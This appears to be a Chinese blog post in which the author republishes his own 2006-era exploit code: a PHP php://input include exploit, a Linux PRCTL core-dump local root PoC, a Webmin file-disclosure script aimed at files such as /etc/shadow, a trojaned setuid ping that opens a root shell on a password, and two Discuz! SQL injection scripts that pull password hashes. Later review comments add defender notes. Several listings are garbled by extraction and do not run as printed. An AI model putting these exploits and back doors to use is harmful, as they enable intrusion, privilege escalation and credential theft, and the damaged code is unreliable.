小东西
翻找以前的东西.找到以前写的一些小东西,自己都不记得了....
呵呵,丢上来,都是些没有技术含量的玩意
Remote Include File 的exp,利用的是php://input,所以要求对方php起码要有4.3.0版本以上:
/*
 * PHP include file exploit
 * Modified by wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
 * Date: Jun 24th 2006
 */
/**
 * Recursively strip magic-quotes backslashes from a request array.
 *
 * Walks $array with each()/list(). Every key that is not 'argc'/'argv' and is
 * either not an all-uppercase name or is numeric has string values passed
 * through stripslashes() and nested arrays processed recursively. $array is
 * taken by reference but is also returned, so callers may use either form.
 *
 * NOTE(review): each() was removed in PHP 8.0, so this helper only runs on
 * older interpreters. Why all-uppercase keys are skipped is not stated on the
 * page — presumably to leave server-style variables alone.
 */
function stripslashes_array(&$array) {
    while (list($key,$var) = each($array)) {
        if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
            if (is_string($var)) {
                $array[$key] = stripslashes($var);
            }
            if (is_array($var)) {
                // Recurse into nested arrays; the recursive call hands back the processed copy.
                $array[$key] = stripslashes_array($var);
            }
        }
    }
    return $array;
}
// Undo magic_quotes_gpc escaping so the values read below are the raw submitted text.
// NOTE(review): get_magic_quotes_gpc() always returns false from PHP 5.4 and was
// removed in 8.0, so this branch is dead on current interpreters.
if (get_magic_quotes_gpc()) {
    $_GET = stripslashes_array($_GET);
    $_POST = stripslashes_array($_POST);
}
// Form state, re-populated from the POST body on every submission.
$server=isset($_POST['server'])?$_POST['server']:"";   // target host: used in the Host: header and in fsockopen() below
$file=isset($_POST['file'])?$_POST['file']:"";         // path plus include parameter, spliced verbatim into the request line
$iszero=isset($_POST['iszero'])?"checked":"";          // checkbox: append "%00" after php://input
$cmd=isset($_POST['cmd'])?$_POST['cmd']:"";            // text sent as the POST body (what the target's php://input yields)
?>
<style>
body {font-family : sans-serif;background-color: #ffffff; color: #000000;}
b {font-family : Courier New, sans-serif;font-size : 24px;}
.center {text-align: center;}
input {
font-family: "Verdana";
font-size: "10px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "2px solid #666666";
}
</style>
<center><b>PHP include file exploit</b><br><font size="2px">Notice: this exploit cannot be used while target is below PHP 4.3.0</font></center><br><br>
<!-- NOTE(review): "server" and "file" are echoed back into value="" without
     htmlspecialchars(), unlike "cmd" further down; a crafted POST to this page
     therefore lands unescaped in its own markup. -->
<form action="" method="post" >
target server : <br>
<input type="text" name="server" value="<?=$server?>"><br><br>
target file (including URI parameter used in include() call ex:"index.php?includeParam=") :<br>
<input type="text" name="file" value="<?=$file?>"><br>
add "%00": <input type="checkbox" <?=$iszero?> name="iszero"><br><br>
exec (enclose php commands between <? .. ?> tags):<br>
<input type="text" name="cmd" value="<?= htmlspecialchars($cmd);?>" ><br><br>
<INPUT type="submit" value="send">
</form>
<?php
// Request handler: runs only after the form has been submitted (cmd present in POST).
if(isset($_POST['cmd']))
{
    // Optional "%00" suffix after php://input, driven by the checkbox above.
    $zerochar = $iszero == "checked"?"%00":"";
    // Hand-assembled HTTP/1.1 request. The request line points the target's
    // include parameter ($file) at php://input; the POST body ($cmd) is then
    // what that stream returns on the target. Nothing here validates $file.
    // Target-side mitigation is allow_url_include=Off and never feeding
    // request data into include()/require().
    $message = "POST /".$file."php://input".$zerochar." HTTP/1.1\r\n";
    // NOTE(review): the media-type list is extraction-damaged (the wildcard
    // type is printed as a bare "/"); it is a runtime string, left as printed.
    $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /\r\n";
    $message .= "Accept-Language: fr\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "Accept-Encoding: deflate\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
    $message .= "Host: ".$server."\r\n";
    // Advertised length counts $cmd only; the "\r\n" appended after the body below is not included.
    $message .= "Content-length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Keep-Alive\r\n";
    $message .= "Cache-Control: no-cache\r\n";
    $message .= "\r\n";
    $message .= $cmd."\r\n";
    // Raw TCP to port 80. The fsockopen() result is not checked: on a failed
    // connection $fd is false and fputs()/feof()/fread() below emit warnings.
    $fd = fsockopen( $server, 80 );
    fputs($fd,$message);
    // Read the whole response and print it inside <pre>, unescaped.
    $resp = "<pre>";
    while(!feof($fd)) {
        $resp .= fread($fd,1024);
    }
    fclose($fd);
    $resp .="</pre>";
    echo $resp;
}
?>
这个是当时linux kernel PRCTL local poc,刚出来的时候我换了个shellcode,后来这个exp出了4个版本,各个都比我的好:)
/* Local r00t Exploit for:                            */
/* Linux Kernel PRCTL Core Dump Handling              */
/* Modified by wofeiwo 13.Jul.2006                    */
/*----------------------------------------------------*/
/* Based on:                                          */
/*----------------------------------------------------*/
/* By:                                                */
/* - dreyer <luna@aditel.org> (main PoC code)         */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code)  */
/* [ 10.Jul.2006 ]                                    */
/****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
/*
 * Text the child's core dump is meant to leave behind under /etc/cron.d: a
 * crontab fragment (SHELL and PATH, then a root "* * * * *" entry) that
 * compiles a setuid-root shell into /tmp/fakesh, runs it and deletes
 * /etc/cron.d/core. It is never referenced from main(); presumably it reaches
 * the cron directory because the core image of the SIGSEGV'd child contains
 * this global.
 * NOTE(review): the line is extraction-damaged (a string literal assigned to a
 * plain char, a stray "</span>" where an escaped quote apparently stood) and
 * does not compile as printed.
 */
char payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root echo -e </span>"#include <stdio.h>\nint main(){\nsetuid(0);setgid(0);setreuid(0);system(\"/bin/sh\");return 0;\n}\n" > /tmp/fakesh.c;gcc -o /tmp/fakesh /tmp/fakesh.c;chmod +s /tmp/fakesh;rm -f /tmp/fakesh.c;/tmp/fakesh;rm -f /etc/cron.d/core\n";
/*
 * Entry point of the PRCTL core-dump PoC.
 *
 * Lifts RLIMIT_CORE to unlimited, forks a child that chdir()s into
 * /etc/cron.d, asks for PR_SET_DUMPABLE=2 and parks in sleep(200); the parent
 * sends that child SIGSEGV so the kernel writes its core file into the cron
 * directory (carrying the `payload` text above), waits 63 s for cron to act on
 * it, then runs the resulting /tmp/fakesh. Always returns 0; the setrlimit()
 * and kill() results are not checked.
 *
 * Defender notes: the behaviour relied on here (a mode-2 dumpable process
 * writing a core file into a directory its user cannot write) was fixed in the
 * kernel shortly after this date; on current kernels fs.suid_dumpable governs
 * it. Indicators worth alerting on: a "core" or any unexpected file under
 * /etc/cron.d, gcc invoked from a cron job, and a setuid binary appearing in /tmp.
 */
int main() {
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("Last modified By: wofeiwo (chage shellcode)\n");
    printf("Last edited: [ 13.Jul.2006 ]\n\n");
    /* No core-size cap, so the dump is not truncated. */
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);
    printf("[*] Creating Cron entry\n");
    if ( !( child = fork() )) {
        /* Child: make /etc/cron.d the cwd (where a core file lands), then wait to be killed. */
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }
    /* Parent: force the child to dump core. */
    kill(child, SIGSEGV);
    printf("[*] Sleeping for aprox. one minute ( please wait )\n");
    sleep(63);
    printf("[*] Running shell (remember to remove /tmp/fakesh when finished) \n");
    system("/tmp/fakesh");
    return 0;
}
python写的,去年webmin 一个高危漏洞的exp
# Webmin - Usermin Arbitrary File Disclosure Exploit
# Write by wofeiwo
# Date: July 10 2006
import sys, urllib, os
def usage (name):
    """Print the banner and command-line help (Python 2 print statement).

    ``name`` is the script's basename (main() strips the directory part); it is
    substituted twice into the usage text.
    """
    print "Webmin - Usermin Arbitrary File Disclosure Exploit\nWrite by wofeiwo <wofeiwo[0x40]gmail[dot]com>\n\nUsage: %s <target> <file>\nExamples: %s http://localhost:10000/ /etc/shadow\n" % (name, name)
def main ():
    """Read one file from a Webmin/Usermin host through its ``unauthenticated`` path.

    ``sys.argv[1]`` is the base URL (it must end in "/", as in the usage example,
    because "unauthenticated" is appended without a separator) and
    ``sys.argv[2]`` the absolute path to read. The request URL is the base URL,
    ``unauthenticated``, a run of ``/..%01`` segments (the traversal the
    vulnerable versions presumably failed to normalise) and the requested path;
    the response body is printed verbatim. Written for Python 2 (``print``
    statement, ``urllib.urlopen``).

    NOTE(review): the expression ``"/..%01"61`` is damaged in the listing and is
    a syntax error as printed.
    Defender notes: the tell-tale in web-server logs is a request to
    ``/unauthenticated/`` containing repeated ``..%01`` segments; mitigation is
    patching Webmin/Usermin and keeping the admin port off untrusted networks.
    """
    if len(sys.argv) != 3:
        (filepath, filename) = os.path.split(sys.argv[0])
        usage(filename)
        sys.exit(-1)
    else:
        target = sys.argv[1] + "unauthenticated" + "/..%01"61 + "/" + sys.argv[2]
        sock = urllib.urlopen(target)
        getfile = sock.read()
        sock.close()
        print getfile
if __name__ == "__main__": main()
n年前写的替换系统ping的后门,因为ping是有s位的:)
#include <unistd.h>
#include <signal.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
/* Trigger string: when argv[1] equals this, main() takes the root-shell branch instead of exec'ing /bin/ping. */
#define PWD "wofeiwo"
/* init the daemon, if success return 0 other <0 */
/*
 * Double-fork daemonisation used by the back-door branch of main(): the first
 * fork()+setsid() detaches from the controlling terminal, SIGHUP is ignored,
 * the second fork() gives up session leadership, then chdir("/"), umask(0),
 * every descriptor below sysconf(_SC_OPEN_MAX) is closed and 0/1/2 are
 * re-pointed at /dev/null through open()+dup(). Returns -1 only when setsid()
 * fails; the intermediate processes exit(0).
 * NOTE(review): `act` is an uninitialised stack struct, so act.sa_mask (the
 * assignment below is commented out) holds indeterminate bits when handed to
 * sigaction().
 */
int daemon_init()
{
    struct sigaction act;
    int i, maxfd;
    if(fork() != 0) exit(0);
    if(setsid() < 0) return(-1);
    act.sa_handler = SIG_IGN;
    /* act.sa_mask = 0; */
    act.sa_flags = 0;
    sigaction(SIGHUP, &act, 0);
    if(fork() != 0) exit(0);
    chdir("/");
    umask(0);
    maxfd = sysconf(_SC_OPEN_MAX);
    for(i=0; i<maxfd; i++)
        close(i);
    /* With everything closed, open() yields fd 0 and the dup()s fill 1 and 2. */
    open("/dev/null", O_RDWR);
    dup(0);
    dup(1);
    dup(2);
    return(0);
}
/*
 * Trojaned stand-in for the setuid ping binary (the prose above notes that
 * ping carries the s bit). With no arguments it prints ping's usage text; if
 * argv[1] equals PWD it daemonises, switches to uid/gid 0 and runs /bin/bash;
 * otherwise it passes the original arguments straight to /bin/ping via execv(),
 * so ordinary use looks unchanged. Where the genuine ping is expected to live
 * relative to this file is not stated on the page.
 *
 * Observations on the listing as printed: sig_chid has no declaration in this
 * file, printf/strcmp/strcpy are used without <stdio.h>/<string.h>, and the
 * `char argv[]` signature looks extraction-damaged, so it does not compile as
 * shown. argv_execv is filled with strcpy() into fixed 128-byte entries without
 * a length check but is never used — execv() receives the original argv.
 *
 * Defender notes: a replaced setuid ping is caught by file-integrity checks
 * (package verification, a stored hash of the binary) and by the anomaly of a
 * "ping" process spawning /bin/bash as root with no controlling terminal.
 */
int main(int argc, char argv[])
{
    int i,j=0;
    char argv_execv[52][128];
    char usage[]=
    "Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]\n"
    " [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]\n"
    " [-M mtu discovery hint] [-S sndbuf]\n"
    " [ -T timestamp option ] [ -Q tos ] [hop1 ] destination\n";
    if (argc == 1) printf("%s", usage);
    if (argc > 1)
    {
        if (strcmp(PWD, argv[1]) == 0)
        {
            /* Back-door branch: detach, become root, drop into a shell. */
            signal(SIGCHLD, sig_chid);
            daemon_init();
            seteuid(0);
            setuid(0);
            setgid(0);
            system("/bin/bash");
            return 1;
        }
        else
        {
            /* Pass-through branch; the copy into argv_execv is dead code. */
            for (i = argc; i > 0; i--)
            {
                strcpy(argv_execv[j],argv[j]);
                j++;
            }
            strcpy(argv_execv[j], "\0");
            execv("/bin/ping", argv);
            return 1;
        }
    }
    return 0;
}
最后两个,都是dz5rc1的exp,一个c语言单线程,一个py的多线程,都是练手写的
/*
 * Discuz! 5.0.0 RC1 SQL injection PoC
 * Author: wofeiwo thx superheis help
 * Date: Aug 24th 2006
 */
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")
/* Number of hash positions main() tries to recover, one character per outer-loop pass. */
#define PASSLEN 32
/*
 * Building blocks of the forged login request assembled in sanddata(): the
 * method and HTTP-version tables, fixed header name/value pairs, the POST body
 * and the SQL fragment that is placed in the X-Forwarded-For header. `query`
 * takes the target uid, the 1-based character position and the candidate ASCII
 * code, so each request asks the server to compare a single character of the
 * stored password hash (a boolean, character-at-a-time probe).
 * NOTE(review): most of these arrays are printed as `char X[]` holding two
 * string literals (only HAccept kept its pointer star) — extraction damage; the
 * block does not compile as shown. HContentLg's " 189" is not what is sent;
 * sanddata() substitutes " 0".
 * temp1 is the request buffer (cleared per call), temp2 the response buffer,
 * which is never cleared between calls and so accumulates replies until full.
 */
char HMod[] = { "GET","POST"};
char HttpVer[] = { "HTTP/1.0", "HTTP/1.1"};
char *HAccept[] = { "Accept:"," image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /"};
char HAcceptLg[] = { "Accept-Language:"," zh-cn"};
char HContentTp[]= { "Content-Type:"," application/x-www-form-urlencoded"};
char HAcceptEn[] = { "Accept-Encoding:"," gzip, deflate"};
char HUserAgent[]= { "User-Agent:"," Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)"};
char HReferer[]= { "REFERER:"," http://127.0.0.1/dz/logging.php?action=login"};
char HHost[]= { "Host: "};
char HContentLg[]= { "Content-Length:"," 189"};
char HContion[]= { "Connection:"," Keep-Alive"};
char HCacheCtr[]= { "Cache-Control:"," no-cache"};
char HXForwardedFor[]= { "X-Forwarded-For:"};
char HCookie[]= { "Cookie:"," cdb_sid=70KRjS; cdb_cookietime=2592000"};
char HPost[]= { "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=heige&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4" };
char query[] = " ' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=%s AND ascii(substring(CONCAT(password),%d,1))=%d /*";
char querystring[128];
char temp1[1024],temp2[10240] = {0};
/*
 * Send one probe request and report whether the guessed character matched.
 *
 * host/port/path/uid identify the target; `ascii` is the candidate character
 * code and `chrnum` the 1-based position in the hash. Resolves the host,
 * formats the request into temp1 (the SQL fragment rides in X-Forwarded-For,
 * which the vulnerable login handler presumably stores without escaping),
 * sends it over a fresh socket and reads the reply into temp2.
 * Returns `ascii` when the reply lacks the marker "ip3" (taken as "guess
 * correct"), 0 otherwise. For the first position it also prints the request
 * and reply, and exits the program if the reply contains neither "SELECT" nor
 * "array_merge" (no SQL error text, so the host is treated as not vulnerable).
 *
 * Observations on the listing: pointer stars are missing in the parameter
 * list, on `he`, `p` and in the two casts (extraction damage), so it does not
 * compile as printed; connect() and send() results are unchecked; the recv()
 * loop repeats while recv() returns <= 0, so a closed or failed connection
 * never leaves it; WSAStartup() runs per call with no WSACleanup(); close()
 * rather than closesocket() is applied to a Winsock handle.
 *
 * Defender notes: the log signal is SQL syntax (`union select`, an SQL comment
 * opener) inside the X-Forwarded-For header of login requests, many in a short
 * window differing in one number; storing client-supplied headers only through
 * parameterised queries removes the injection point.
 */
int sanddata(char host, int port, char path, char uid, int ascii, int chrnum)
{
    WSADATA WSAData={0};
    struct hostent he;
    struct sockaddr_in ServerAddr={0};
    SOCKET Socket=0;
    int ren = 0;
    char p = NULL;
    if(WSAStartup(MAKEWORD(2,2), &WSAData)) return 1;
    if((he = gethostbyname(host)) == 0)
    {
        fprintf(stderr, "\r\n[-] Failed resolving %s\r\n", host);
        exit(-1);
    }
    Socket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    ServerAddr.sin_family = AF_INET;
    ServerAddr.sin_addr = ((struct in_addr )he->h_addr);
    ServerAddr.sin_port = htons(port);
    memset(temp1,0,1024);
    /* Fill the uid / position / candidate into the SQL fragment. */
    sprintf(querystring, query, uid, chrnum, ascii);
    /* Request line, twelve header lines, blank line, POST body. */
    sprintf(temp1, "%s %s%s %s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "\r\n"
    "%s\r\n"
    "\r\n\r\n"
    ,
    HMod[1],path,"logging.php?action=login",HttpVer[1],
    HAccept[0],HAccept[1],
    HAcceptLg[0],HAcceptLg[1],
    HContentTp[0],HContentTp[1],
    HAcceptEn[0],HAcceptEn[1],
    HUserAgent[0],HUserAgent[1],
    HReferer[0],HReferer[1],
    HHost[0],host,
    HContentLg[0]," 0",
    HContion[0],HContion[1],
    HCacheCtr[0],HCacheCtr[1],
    HXForwardedFor[0],querystring,
    HCookie[0],HCookie[1],
    HPost[0]
    );
    if (chrnum == 1) printf("\r\n%s\r\n",temp1);
    connect(Socket,(SOCKADDR )&ServerAddr,sizeof(ServerAddr));
    send(Socket,temp1,strlen(temp1),0);
    //sleep(1);
    /* Append to whatever temp2 already holds from earlier calls. */
    while((ren = recv(Socket,temp2+strlen(temp2),10240-strlen(temp2),0))<=0){;}
    if (chrnum == 1) printf("\r\n%s\r\n",temp2);
    if(chrnum == 1 && (p = strstr(temp2, "SELECT")) == NULL && (p = strstr(temp2, "array_merge")) == NULL)
    {
        fprintf(stderr, "\r\n[-] Unvulnerable host\r\n");
        exit(1);
    }
    if((p = strstr(temp2, "ip3")) == NULL)
    {
        close(Socket);
        return ascii;
    }
    close(Socket);
    return 0;
}
/*
 * Entry point: <host> <port> <path> <uid>. For each of the PASSLEN positions it
 * tries the digit codes 48..57 and then the letter codes 98..122 through
 * sanddata(); a non-zero return is noticed on the following loop iteration,
 * printed as that position's character, and the inner loops are left through
 * the `finded` label, which also resets `ret`. A position where no candidate
 * returned non-zero prints nothing, so the output can be shorter than PASSLEN.
 * NOTE(review): the `char argv[]` signature is extraction-damaged as printed.
 */
int main(int argc,char argv[])
{
    int i = 0,j = 0,ret = 0;
    fprintf(stdout, "Discuz! 5.0.0 RC1 SQL injection exploit\r\n");
    fprintf(stdout, "Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\r\n\r\n");
    if(argc != 5)
    {
        fprintf(stderr, "Usage: %s <host> <port> <path> <uid>\r\n", argv[0]);
        fprintf(stderr, "Example: %s localhost 80 /dz/ 1\r\n", argv[0]);
        exit(1);
    }
    fprintf(stdout, "[+] Connect %s\r\n", argv[1]);
    fprintf(stdout, "[+] Trying ..\r\n");
    fprintf(stdout, "[+] Plz wait a monment ..\r\n");
    fprintf(stdout, "[+] The uid = %s password hash is: ", argv[4]);
    for(j = 1; j <= PASSLEN; j++)
    {
        /* Digits first ... */
        for(i = 48; i < 58; i++)
        {
            if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
            else
            {
                fprintf(stdout, "%c", ret);
                goto finded;
            }
        }
        /* ... then letters. */
        for(i = 98; i < 123; i++)
        {
            if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
            else
            {
                fprintf(stdout, "%c", ret);
                goto finded;
            }
        }
        finded: ret = 0;
    }
    fprintf(stdout, "\r\n");
    fprintf(stdout, "[+] Finished\r\n");
    return 0;
}
# Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)
# Author: wofeiwo
# Date: Aug 13th 2006
import sys
import httplib
import threading
from urlparse import urlparse
from time import sleep
# One slot per hash character, keyed by 1-based position. Each worker thread
# (named "1".."32") writes the character it recovers into its own slot from
# injection(); main() prints the slots in order once every thread has finished.
password = {1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:'',11:'',12:'',13:'',14:'',15:'',16:'',17:'',18:'',19:'',20:'',21:'',22:'',23:'',24:'',25:'',26:'',27:'',28:'',29:'',30:'',31:'',32:''}
class creatthread (threading.Thread):
    """Worker thread that recovers one character position of the hash.

    ``threadname`` doubles as the 1-based position: run() hands the thread's
    name to injection() as ``num``. ``url`` is the urlparse() result for the
    target and ``u`` the base path normalised by main().
    """
    def __init__ (self, threadname, url, u):
        self.realurl = url
        self.realu = u
        threading.Thread.__init__(self, name = threadname)
    def run (self):
        # Fixed hash length of 32; injection() does not actually read this argument.
        lenth = 32
        injection(lenth, self.realurl, self.realu, self.getName())
def injection (lenthofpass, realurl, path, num):
    """Find one character of the stored password hash for uid ``sys.argv[2]``.

    For each candidate code (a-z, then 0-9) it POSTs a login to ``logging.php``
    with the SQL fragment carried in the X-Forwarded-For header — the same
    injection point as the C version above — sleeping a second per request.
    A reply without "SELECT" is treated as "not vulnerable" and sys.exit(1) is
    called; note that from a worker thread this only ends that thread, the
    others keep running. A reply without the marker "ip3" is treated as a hit:
    the character is stored in ``password[int(num)]`` and the loop ends.

    ``realurl`` is a urlparse() tuple (index 1 is the host), ``path`` the base
    path ending in "/", ``num`` the position as a string; ``lenthofpass`` is
    unused. Written for Python 2 (``print`` statements, ``httplib``).
    NOTE(review): the ``query`` line is damaged in the listing (stray "</span>",
    truncated SQL comment opener) and is a syntax error as printed.
    Defender notes: same web-log signal as the C variant — SQL keywords inside
    X-Forwarded-For on login requests — here as 32 concurrent streams from one
    client.
    """
    ran = range(97, 123)
    for a in range(48, 58): ran.append(a)
    for i in ran:
        query = '</span>' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + num + ',1))=' + str(i) + ' /'
        header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
        data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
        #print header
        #sys.exit(1)
        http = httplib.HTTPConnection(realurl[1])
        http.request("POST", path + "logging.php?action=login&",data , header)
        sleep(1)
        response = http.getresponse()
        re1 = response.read()
        if re1.find('SELECT') == -1:
            # No SQL error text in the reply: treated as not vulnerable.
            print '[-] Unvalnerable host'
            print '[-] Exit..'
            sys.exit(1);
        elif re1.find('ip3') == -1:
            # Marker absent: this candidate matched; record it and stop probing.
            password[int(num)] = chr(i)
            #print '[+] password ' + num + ': ' + chr(i)
            http.close()
            sleep(1)
            break
        #print re1
        #print '-----------------------------------------------'
        http.close()
        sleep(1)
def main ():
    """Parse ``<url> <uid>``, start 32 worker threads and print the recovered hash.

    The base path is ``urlparse(sys.argv[1])[2]``. ``url[2:-1]`` is a tuple
    slice and can never equal '/', so the first branch is always taken and a
    '/' is always appended. After starting the threads the main thread
    busy-waits on threading.activeCount() until it is the only one left; the
    ``else`` clause of that while loop then prints password[1..32] in order.
    Written for Python 2 (``print`` statements).
    """
    print 'Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)'
    print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'
    if len(sys.argv) == 3:
        url = urlparse(sys.argv[1])
        # NOTE(review): this compares a tuple with '/', so it is always true.
        if url[2:-1] != '/':
            u = url[2] + '/'
        else:
            u = url[2]
    else:
        print "Usage: %s <url> <uid>" % sys.argv[0]
        print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
        sys.exit(0)
    print '[+] Connect %s' % url[1]
    print '[+] Begin threads'
    print '[+] Plz wait a long long time'
    # One worker per hash position; the thread name carries the position.
    for a in range(1,33) :
        thread = creatthread(str(a), url, u)
        thread.start()
    # Spin until only the main thread remains (no join()), then report.
    while threading.activeCount() != 1:
        continue
    else:
        sys.stdout.write( '[+] The uid=' + sys.argv[2] + ' password hash is: ' )
        for n in range(1, 33) :
            sys.stdout.write(password[n])
        sys.stdout.write('\n[+] Finished \n')
if __name__ == '__main__': main()